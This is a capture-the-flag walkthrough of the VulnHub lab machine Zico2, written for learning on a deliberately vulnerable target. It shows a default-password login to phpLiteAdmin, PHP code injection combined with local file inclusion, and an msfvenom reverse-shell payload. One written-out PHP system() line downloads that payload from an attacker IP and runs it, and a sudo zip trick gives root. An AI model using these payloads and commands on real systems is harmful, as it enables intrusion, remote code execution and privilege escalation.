Zico2 is a machine that came on VulnHub. Created by Rafael, it surfaced on June 19th, 2017. It can be downloaded from https://www.vulnhub.com/entry/zico2-1,210/

The objective is to get root privileges and get the flag.

For a change, I would be using https://root-me.org to run the target machine. I tried to run the machine locally using VMware and Virtual Box, however, due to some networking issues, Zico was not being assigned an IP address. I contacted Rafael on Twitter, and he was more than happy and willing to solve my problem. In the end, he suggested I give https://root-me.org a try as they already have a working copy of Zico in their CTF-all-day.

Once signed up, the process of starting Zico is simple. You go on CTF-all-day, select the vulnerable machine you want to use, in this case, Zico2 (last in the last as its alphabetized), and you start the game.

My machine was reachable at http://ctf03.root-me.org/, and this is what it showed:

Let the attacking begin. Like my attacking machine, I will be using Kali 2017.1 running on a VMware Fusion.

Running a simple Zenmap scan showed the following ports open:

Seeing we know that there is Zico’s Shop running on port 80, let’s just focus on that for now. I ran dirb to see what more information I could gather from it:

$ dirb http://ctf03.root-me.org/

This showed a directory called dbadmin which had a PHP file called test_db.php:

Which opened phpLiteAdmin. Trying the first default password, admin, gave me the entry to go in:

I looked around and found that 2 users were created. I tried to decrypt the hash and log in using SSH, but it did not work:

After looking around for a while, I realized that this might be vulnerable to Remote PHP Code Injection (https://www.exploit-db.com/exploits/24044/), so I thought I would give that a try:

  • So, I created a database called hack.php
  • I created a table with the name test with 1 column
  • Under test, I created a field test as TEXT and with the default value: <?php phphinfo(); ?>

Now, to exploit this, I need to find an LFI vulnerability.

To do that, I went back to the web application and started going through the source code. Within minutes the following code block caught my eye:

Ethical Hacking Training – Resources (InfoSec)

This looked like something I could work with:

http://ctf03.root-me.org/view.php?page=../../usr/databases/hack.php

It worked! Now it is time to make a shell and get connected. To make the shell, I used MSFvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.92.141 lport=4444 -f elf > /root/Desktop/shell

Time to upload it to the target machine:

I update the entry in the table to the following:

<?php system(“cd /tmp; wget http://172.16.92.141/shell; chmod +x shell; ./shell”); ?>

moreover, start a multi/handler on Metasploit:

and we get a session!

Now when looked into the folders, a file called, wp-config.php present in /home/zico/wordpress/ seemed to give some useful information:

Using these credentials, I tried to log in via SSH, and they worked!

Now time to get root privileges:

On trying the command:

$ sudo -l

This is what is showed us:

After running the following two commands:

$ touch /tmp/exploit

$ sudo -u root zip /tmp/exploit.zip /tmp/exploit -T –unzip-command=”sh -c /bin/sh”

We are root!

Here’s the flag: